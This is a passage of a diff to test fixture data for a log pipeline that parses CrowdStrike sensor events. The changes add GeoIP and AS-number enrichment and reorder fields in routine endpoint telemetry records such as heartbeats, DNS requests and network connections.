"{\"ChannelVersion\":\"0\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"1620585913\",\"ChannelDiffStatus\":\"1\",\"aip\":\"67.43.156.13\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"210\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ChannelVersionRequiredMacV2\",\"id\":\"ffffffff-1111-11eb-8cc5-02c6fb049dd3\",\"ErrorCode\":\"0\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff2d7b4778a73b2cf58d327e42\",\"timestamp\":\"1625677480455\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-8cc5-02c6fb049dd3", "created": "2021-07-07T17:04:40.455Z" @@ -1269,17 +1443,23 @@ }, { "observer": { - "serial_number": "fffffffff6e146908cbf31d72b94b626", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "fffffffff6e146908cbf31d72b94b626", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:05:40.292Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, @@ -1294,8 +1474,11 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { - "ingested": "2021-12-09T13:36:11.150677900Z", + "ingested": "2021-12-14T14:41:26.533755497Z", "original": "{\"event_simpleName\":\"SensorHeartbeat\",\"ConfigStateHash\":\"1156120155\",\"NetworkContainmentState\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"SensorStateBitMap\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ConfigurationVersion\":\"10\",\"name\":\"SensorHeartbeatLinV4\",\"ConfigIDPlatform\":\"8\",\"id\":\"ffffffff-1111-11eb-993f-02b8dc387eb5\",\"ConfigIDBuild\":\"11611\",\"aid\":\"fffffffff6e146908cbf31d72b94b626\",\"timestamp\":\"1625677540292\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:40.292Z", "kind": "event", @@ -1344,12 +1527,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff083845f68a7de3d95cb34361", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff083845f68a7de3d95cb34361", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:28.570Z", "file": { @@ -1375,7 +1567,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150684100Z", + "ingested": "2021-12-14T14:41:26.533755970Z", "original": "{\"event_simpleName\":\"JavaClassFileWritten\",\"ContextTimeStamp\":\"1625677528.570\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364783686797112486\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"04000001000000000000000000000000986b480e00000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"JavaClassFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-97c6-02fd02aca859\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff083845f68a7de3d95cb34361\",\"timestamp\":\"1625677528717\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class\"}", "created": "2021-07-07T17:05:28.717Z", "kind": "event", @@ -1405,8 +1597,20 @@ "type": "macos" }, "destination": { - "port": 443, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 443, "ip": "67.43.156.14" }, "source": { @@ -1426,12 +1630,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffff96f142f6b2475f3c584ddd80", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff96f142f6b2475f3c584ddd80", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:12.700Z", "ecs": { @@ -1451,7 +1664,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150690400Z", + "ingested": "2021-12-14T14:41:26.533756358Z", "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkConnectIP4\",\"ContextTimeStamp\":\"1625677512.700\",\"ConfigStateHash\":\"1620585913\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364796317497854624\",\"RemotePort\":\"443\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"0\",\"Entitlements\":\"15\",\"name\":\"NetworkConnectIP4MacV10\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff96f142f6b2475f3c584ddd80\",\"RemoteAddressIP4\":\"67.43.156.14\",\"ConnectionDirection\":\"0\",\"InContext\":\"0\",\"timestamp\":\"1625677512892\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:12.892Z", "kind": "event", @@ -1503,12 +1716,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff7ecf4e61bba14ca5ac5d17b1", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff7ecf4e61bba14ca5ac5d17b1", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:35.806Z", "ecs": { @@ -1526,7 +1748,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150696600Z", + "ingested": "2021-12-14T14:41:26.533756760Z", "original": "{\"event_simpleName\":\"DnsRequest\",\"ContextTimeStamp\":\"1625677475.806\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364977197365370629\",\"DomainName\":\"jss.dom1.com\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"DnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-9644-060415b1fd87\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff7ecf4e61bba14ca5ac5d17b1\",\"timestamp\":\"1625677476111\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"28\"}", "created": "2021-07-07T17:04:36.111Z", "kind": "event", @@ -1565,12 +1787,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:04.770Z", "file": { @@ -1598,7 +1829,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150702900Z", + "ingested": "2021-12-14T14:41:26.533757218Z", "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677504.770\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"365053504406857894\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9\",\"FileIdentifier\":\"05000001000000000000000000000000b588050000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677540055\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/BitBar/countdown_timer.1s.py\"}", "created": "2021-07-07T17:05:40.055Z", "kind": "event", @@ -1621,43 +1852,27 @@ } }, { - "os": { - "type": "linux" - }, - "source": { + "observer": { "geo": { - "continent_name": "Europe", - "country_name": "Denmark", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 10.0, - "lat": 56.0 + "lon": 90.5, + "lat": 27.5 }, - "country_iso_code": "DK" + "country_iso_code": "BT" }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } - }, - "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffffbfbf4ff5aa56a26ad3c1a942", "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffbfbf4ff5aa56a26ad3c1a942", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:05:26.386Z", + "os": { + "type": "linux" + }, "ecs": { "version": "1.12.0" }, @@ -1674,8 +1889,21 @@ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, + "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Norway", + "location": { + "lon": 10.0, + "lat": 62.0 + }, + "country_iso_code": "NO" + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, "event": { - "ingested": "2021-12-09T13:36:11.150709200Z", + "ingested": "2021-12-14T14:41:26.533757653Z", "original": "{\"InterfaceIndex\":\"186\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"event_platform\":\"Lin\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1156120155\",\"name\":\"LocalIpAddressRemovedIP6LinV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-b3c1-02ff598b7945\",\"aid\":\"ffffffffbfbf4ff5aa56a26ad3c1a942\",\"timestamp\":\"1625677526386\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:26.386Z", "kind": "state", @@ -1695,7 +1923,13 @@ "name": "LocalIpAddressRemovedIP6LinV1", "ConfigStateHash": "1156120155", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -1714,12 +1948,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff24db47799d1a85aae61dc7bc", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff24db47799d1a85aae61dc7bc", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:59.994Z", "file": { @@ -1743,7 +1986,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150715400Z", + "ingested": "2021-12-14T14:41:26.533758056Z", "original": "{\"event_simpleName\":\"DirectoryCreate\",\"ContextTimeStamp\":\"1625677499.994\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053555029062046\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"Flags\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"0\",\"Entitlements\":\"15\",\"name\":\"DirectoryCreateMacV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"VnodeType\":\"2\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff24db47799d1a85aae61dc7bc\",\"TargetDirectoryName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\",\"timestamp\":\"1625677500089\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\"}", "created": "2021-07-07T17:05:00.089Z", "kind": "event", @@ -1782,13 +2025,37 @@ "type": "linux" }, "destination": { - "port": 443, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", + "port": 443, "ip": "67.43.156.13" }, "source": { - "port": 40394, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 40394, "ip": "67.43.156.14" }, "url": { @@ -1804,12 +2071,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff58de4e748d9f64c85a9b49e6", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff58de4e748d9f64c85a9b49e6", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:05:17.658Z", "ecs": { @@ -1829,7 +2105,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150721900Z", + "ingested": "2021-12-14T14:41:26.533758736Z", "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"NetworkCloseIP4\",\"ContextTimeStamp\":\"1625677517.658\",\"ConfigStateHash\":\"1479784503\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"84424232977619\",\"RemotePort\":\"443\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"40394\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP4LinV6\",\"id\":\"ffffffff-1111-11eb-9015-02e89cda7d5f\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff58de4e748d9f64c85a9b49e6\",\"RemoteAddressIP4\":\"67.43.156.13\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677517986\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:17.986Z", "kind": "event", @@ -1855,30 +2131,33 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", + "type": "agent", + "version": "1007.4.0013701.1" + }, "process": { "entity_id": "365053546767850587", "thread": { "id": 0 } }, + "@timestamp": "2021-07-07T17:04:56.750Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2021-07-07T17:04:56.750Z", "ecs": { "version": "1.12.0" }, @@ -1894,7 +2173,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150728200Z", + "ingested": "2021-12-14T14:41:26.533759489Z", "original": "{\"VolumeMediaName\":\"AppleAPFSMedia\",\"VolumeDeviceProtocol\":\"PCI-Express\",\"VolumeDeviceVendor\":\"\",\"ContextThreadId\":\"0\",\"VolumeMediaContent\":\"41504653-0000-11AA-AA11-00306543ECAC\",\"VolumeMediaEjectable\":\"0\",\"aip\":\"67.43.156.14\",\"VolumeAppearanceTime\":\"1625677422.647\",\"VolumeDeviceModel\":\"APPLE SSD SM0256L\",\"VolumeMediaBSDName\":\"disk1s3\",\"VolumeMountPoint\":\"/Volumes/Recovery\",\"event_platform\":\"Mac\",\"VolumeType\":\"APFS\",\"VolumeMediaRemovable\":\"0\",\"VolumeMediaBSDUnit\":\"1\",\"VolumeFileSystemDriver\":\"apfs\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"VolumeMediaSize\":\"250685575168\",\"EffectiveTransmissionClass\":\"2\",\"VolumeBusName\":\"IONVMeController\",\"timestamp\":\"1625677496804\",\"VolumeMediaBSDMinor\":\"8\",\"VolumeMediaWritable\":\"1\",\"event_simpleName\":\"FsVolumeMounted\",\"VolumeDevicePath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1\",\"VolumeName\":\"Recovery\",\"ContextTimeStamp\":\"1625677496.750\",\"VolumeSectorSize\":\"4096\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053546767850587\",\"VolumeBusPath\":\"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController\",\"VolumeDeviceInternal\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"VolumeUUID\":\"85400FAD-01F9-0442-8C5D-441F365D4909\",\"VolumeDeviceRevision\":\"CXS4LA0Q\",\"Entitlements\":\"15\",\"name\":\"FsVolumeMountedMacV1\",\"VolumeMediaBSDMajor\":\"1\",\"VolumeMediaPath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"VolumeMediaUUID\":\"AD0F4085-F901-4204-8C5D-441F365D4909\",\"VolumeMediaWhole\":\"0\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", "created": "2021-07-07T17:04:56.804Z", "kind": "event", @@ -1942,32 +2221,36 @@ "VolumeMediaWhole": "0", "cid": "ffffffff15754bcfb5f9152ec7ac90ac", "VolumeIsNetwork": "0" - } - }, - { - "os": { - "type": "linux" - }, - "source": { - "mac": "0e-d6-ff-ff-ff-63", - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "url": { "scheme": "http" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { - "serial_number": "ffffffff190e436aaebc3892bcda5beb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff190e436aaebc3892bcda5beb", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:05:14.374Z", + "os": { + "type": "linux" + }, "ecs": { "version": "1.12.0" }, @@ -1982,8 +2265,25 @@ "67.43.156.14" ] }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "mac": "0e-d6-ff-ff-ff-63", + "ip": "67.43.156.14" + }, "event": { - "ingested": "2021-12-09T13:36:11.150734500Z", + "ingested": "2021-12-14T14:41:26.533759908Z", "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677513.841\",\"aip\":\"67.43.156.14\",\"PhysicalAddress\":\"0e-d6-ff-ff-ff-63\",\"InterfaceAlias\":\"eth0\",\"InterfaceIndex\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP4LinV1\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffff190e436aaebc3892bcda5beb\",\"timestamp\":\"1625677514374\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:14.374Z", "kind": "state", @@ -2006,46 +2306,36 @@ "PhysicalAddressLength": 6, "InterfaceAlias": "eth0", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } - }, - { - "os": { - "type": "macos" - }, - "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Denmark", - "location": { - "lon": 10.0, - "lat": 56.0 - }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } - }, - "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:40.056Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -2062,8 +2352,21 @@ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, + "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Norway", + "location": { + "lon": 10.0, + "lat": 62.0 + }, + "country_iso_code": "NO" + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, "event": { - "ingested": "2021-12-09T13:36:11.150740700Z", + "ingested": "2021-12-14T14:41:26.533760290Z", "original": "{\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"InterfaceIndex\":\"8\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP6MacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:40.056Z", "kind": "state", @@ -2086,47 +2389,36 @@ "name": "LocalIpAddressRemovedIP6MacV1", "EffectiveTransmissionClass": "2", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } - }, - { - "os": { - "type": "macos" - }, - "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Denmark", - "location": { - "lon": 10.0, - "lat": 56.0 - }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } - }, - "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "mac": "c2-27-b0-27-83-0f", - "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { - "serial_number": "ffffffff0ad7494e8e817b3903f4eebb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff0ad7494e8e817b3903f4eebb", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:21.723Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -2143,8 +2435,22 @@ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, + "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Norway", + "location": { + "lon": 10.0, + "lat": 62.0 + }, + "country_iso_code": "NO" + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "mac": "c2-27-b0-27-83-0f", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, "event": { - "ingested": "2021-12-09T13:36:11.150747Z", + "ingested": "2021-12-14T14:41:26.533760675Z", "original": "{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"67.43.156.14\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"llw0\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"8\",\"event_platform\":\"Mac\",\"InterfaceType\":\"6\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"PhysicalAddressLength\":\"6\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521723\",\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1620585913\",\"PhysicalAddress\":\"c2-27-b0-27-83-0f\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP6MacV1\",\"aid\":\"ffffffff0ad7494e8e817b3903f4eebb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.723Z", "kind": "state", @@ -2180,7 +2486,13 @@ "InUcastPkts": "0", "EffectiveTransmissionClass": "2", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -2211,12 +2523,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff23d24c4193ffa6f270775ee5", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff23d24c4193ffa6f270775ee5", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:07.037Z", "ecs": { @@ -2236,7 +2557,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150753300Z", + "ingested": "2021-12-14T14:41:26.533761052Z", "original": 